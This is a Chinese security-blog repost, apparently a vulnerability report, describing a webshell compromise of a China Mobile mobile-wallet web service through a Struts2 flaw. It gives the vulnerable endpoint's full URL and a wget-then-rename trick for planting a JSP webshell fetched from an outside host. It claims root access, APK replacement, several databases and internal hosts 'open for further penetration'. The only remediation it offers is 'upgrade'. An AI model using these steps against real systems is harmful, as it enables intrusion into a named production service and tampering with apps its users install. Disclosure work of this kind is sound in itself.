纵有疾风起
人生不言弃
首页 > 博客 > 黑客攻防 > 正文

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网

2020-10-10 分类:黑客攻防 阅读(267) 评论(0) 扫描二维码 隐藏侧边

 

struts2漏洞

地址:http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl=

服务器有限制,wget无法直接下载shell,小技巧绕过

先下载txt格式然后vm命令改成jsp

wget -P 绝对路径 http://www.xxx.com/shell.txt

mv 绝对路径/shell.txt 绝对路径/shell.jsp

root权限
 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图1

可替换apk应用
 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图2

涉及多个数据库
 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图3

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图4

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图5

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图6

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图7

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图8

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图9

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图10

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图11

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图12

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图13

多个业务备份
 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图14

多个内网机器,可继续渗透
 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图15

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图16

 

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网插图17

 

 

解决方案:

升级
    上一篇: 总结Web应用中基于浏览器的安全漏洞 – 网站安全 – 自学php网

    下一篇: Alibaba CTF 2015 – XSS400 WriteUP – 网站安全 – 自学php网

AD:【更多看点】学生“冒死”偷拍老师,当看到最后一个,网友:这谁能顶得住

 收藏 (0)
未经允许不得转载:起风网 » 中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换) – 网站安全 – 自学php网
分享到: 生成海报
标签:

825e5b70b68d744d

相关推荐

评论 抢沙发

评论前必须登录!

立即登录